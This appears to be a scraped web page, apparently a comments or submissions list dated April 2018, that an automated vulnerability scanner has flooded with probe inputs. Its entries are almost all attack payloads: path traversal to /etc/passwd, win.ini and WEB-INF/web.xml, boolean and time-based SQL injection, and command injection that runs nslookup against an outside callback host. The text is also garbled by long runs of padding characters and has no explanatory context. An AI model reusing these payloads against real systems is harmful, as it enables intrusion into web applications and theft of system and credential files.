\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ - April 19, 2018, 6:35 pm
1

WEB-INF/web.xml - April 19, 2018, 6:35 pm
1

WEB-INF\web.xml - April 19, 2018, 6:35 pm
1

1 - April 19, 2018, 6:35 pm
../../../../../../../../../../etc/passwd

1 - April 19, 2018, 6:35 pm
../../../../../../../../../../../../../../../proc/version

1 - April 19, 2018, 6:35 pm
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1 - April 19, 2018, 6:35 pm
../../../../../../../../../../etc/passwd.jpg

1 - April 19, 2018, 6:35 pm
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1 - April 19, 2018, 6:35 pm
/../..//../..//../..//../..//../..//etc/passwd.jpg

1 - April 19, 2018, 6:35 pm
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1 - April 19, 2018, 6:35 pm
/etc/passwd

1 - April 19, 2018, 6:35 pm
%2fetc%2fpasswd

1 - April 19, 2018, 6:35 pm
/.././.././.././.././.././.././.././../etc/./passwd%00

1 - April 19, 2018, 6:35 pm
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1 - April 19, 2018, 6:35 pm
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1 - April 19, 2018, 6:35 pm
................etc/passwd

1 - April 19, 2018, 6:35 pm
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1 - April 19, 2018, 6:35 pm
file:///etc/passwd

1 - April 19, 2018, 6:35 pm
/\../\../\../\../\../\../\../etc/passwd

1 - April 19, 2018, 6:35 pm
WEB-INF/web.xml

1 - April 19, 2018, 6:35 pm
$(nslookup dns.ce.\037203.21-11411.21.8f9f8.\1.bxss.me)

1 - April 19, 2018, 6:35 pm
/WEB-INF/web.xml

1 - April 19, 2018, 6:35 pm
WEB-INF\web.xml

1 - April 19, 2018, 6:35 pm
../../../../../../../../../../windows/win.ini

1 - April 19, 2018, 6:35 pm
C:\WINDOWS\system32\drivers\etc\hosts

1 - April 19, 2018, 6:35 pm
../../../../../../../../../../windows/win.ini.jpg

1 - April 19, 2018, 6:35 pm
windowswin.ini

1';copy (select '') to program 'nslookup dns.sqli.\037203.21-11412.21.8f9f8.\1.bxss.me - April 19, 2018, 6:35 pm
1

1 - April 19, 2018, 6:35 pm
................windowswin.ini

645' - April 19, 2018, 6:35 pm
1

1 - April 19, 2018, 6:35 pm
..\..\..\..\..\..\..\..\windows\win.ini

1 - April 19, 2018, 6:35 pm
1

1 - April 19, 2018, 6:35 pm
1

1 - April 19, 2018, 6:35 pm
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1 - April 19, 2018, 6:35 pm
-1 OR 2+195-195-1=0+0+0+1 --

1 - April 19, 2018, 6:35 pm
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1 - April 19, 2018, 6:35 pm
-1 OR 3+195-195-1=0+0+0+1 --

1 - April 19, 2018, 6:35 pm
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1 - April 19, 2018, 6:35 pm
-1 OR 3*2<(0+5+195-195) --

1 - April 19, 2018, 6:35 pm
-1 OR 3*2>(0+5+195-195) --

1 - April 19, 2018, 6:35 pm
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1 - April 19, 2018, 6:35 pm
-1 OR 2+539-539-1=0+0+0+1

1 - April 19, 2018, 6:35 pm
-1 OR 3+539-539-1=0+0+0+1

1 - April 19, 2018, 6:35 pm
WEB-INF/web.xml

1 - April 19, 2018, 6:35 pm
-1 OR 3*2<(0+5+539-539)

1 - April 19, 2018, 6:35 pm
WEB-INF\web.xml

1 - April 19, 2018, 6:35 pm
-1 OR 3*2>(0+5+539-539)

1 - April 19, 2018, 6:35 pm
-1' OR 2+130-130-1=0+0+0+1 --

1 - April 19, 2018, 6:35 pm
../../../../../../../../../../etc/passwd

1 - April 19, 2018, 6:35 pm
-1' OR 3+130-130-1=0+0+0+1 --

1 - April 19, 2018, 6:35 pm
../../../../../../../../../../../../../../../proc/version

1 - April 19, 2018, 6:35 pm
-1' OR 3*2<(0+5+130-130) --

1 - April 19, 2018, 6:35 pm
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1 - April 19, 2018, 6:35 pm
-1' OR 3*2>(0+5+130-130) --

1 - April 19, 2018, 6:35 pm
../../../../../../../../../../etc/passwd.jpg

1 - April 19, 2018, 6:35 pm
-1' OR 2+156-156-1=0+0+0+1 or '588n5pk9'='

1 - April 19, 2018, 6:35 pm
-1' OR 3+156-156-1=0+0+0+1 or '588n5pk9'='

1 - April 19, 2018, 6:35 pm
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1 - April 19, 2018, 6:35 pm
-1' OR 3*2<(0+5+156-156) or '588n5pk9'='

1 - April 19, 2018, 6:35 pm
/../..//../..//../..//../..//../..//etc/passwd.jpg

1 - April 19, 2018, 6:35 pm
-1' OR 3*2>(0+5+156-156) or '588n5pk9'='

1 - April 19, 2018, 6:35 pm
-1" OR 2+325-325-1=0+0+0+1 --

1 - April 19, 2018, 6:35 pm
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1 - April 19, 2018, 6:35 pm
-1" OR 3+325-325-1=0+0+0+1 --

1 - April 19, 2018, 6:35 pm
/etc/passwd

1 - April 19, 2018, 6:35 pm
-1" OR 3*2<(0+5+325-325) --

1 - April 19, 2018, 6:35 pm
%2fetc%2fpasswd

1 - April 19, 2018, 6:35 pm
-1" OR 3*2>(0+5+325-325) --

1 - April 19, 2018, 6:35 pm
/.././.././.././.././.././.././.././../etc/./passwd%00

1 - April 19, 2018, 6:35 pm
&nslookup dns.ce.\037203.21-11417.21.8f9f8.\1.bxss.me&'\"`0&nslookup dns.ce.\037203.21-11417.21.8f9f8.\1.bxss.me&`'

1 - April 19, 2018, 6:35 pm
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1 - April 19, 2018, 6:35 pm
set|set&set

1 - April 19, 2018, 6:35 pm
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1 - April 19, 2018, 6:35 pm
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1 - April 19, 2018, 6:35 pm
-1; waitfor delay '0:0:3' --

1 - April 19, 2018, 6:35 pm
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1 - April 19, 2018, 6:35 pm
-1); waitfor delay '0:0:3' --

1 - April 19, 2018, 6:35 pm
1 waitfor delay '0:0:3' --

1 - April 19, 2018, 6:35 pm
................etc/passwd

1 - April 19, 2018, 6:35 pm
WJAxDtj1'; waitfor delay '0:0:6' --

1 - April 19, 2018, 6:35 pm
-1;select pg_sleep(6); --

1 - April 19, 2018, 6:35 pm
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1 - April 19, 2018, 6:35 pm
-1);select pg_sleep(6); --

1 - April 19, 2018, 6:35 pm
file:///etc/passwd

1 - April 19, 2018, 6:35 pm
-1));select pg_sleep(6); --

1 - April 19, 2018, 6:35 pm
cWSrLbIf';select pg_sleep(6); --

1 - April 19, 2018, 6:35 pm
/\../\../\../\../\../\../\../etc/passwd

1 - April 19, 2018, 6:35 pm
o3fsglgg');select pg_sleep(6); --

1 - April 19, 2018, 6:35 pm
IEr4qpYc'));select pg_sleep(9); --

1 - April 19, 2018, 6:35 pm
WEB-INF/web.xml

1 - April 19, 2018, 6:35 pm
/WEB-INF/web.xml

1 - April 19, 2018, 6:35 pm
WEB-INF\web.xml

1 - April 19, 2018, 6:35 pm
../../../../../../../../../../windows/win.ini

1 - April 19, 2018, 6:35 pm
C:\WINDOWS\system32\drivers\etc\hosts

1 - April 19, 2018, 6:35 pm
../../../../../../../../../../windows/win.ini.jpg

1 - April 19, 2018, 6:35 pm
windowswin.ini

1 - April 19, 2018, 6:35 pm
................windowswin.ini

1 - April 19, 2018, 6:35 pm
..\..\..\..\..\..\..\..\windows\win.ini

1 - April 19, 2018, 6:35 pm
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1 - April 19, 2018, 6:35 pm
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1 - April 19, 2018, 6:35 pm
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1 - April 19, 2018, 6:35 pm
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.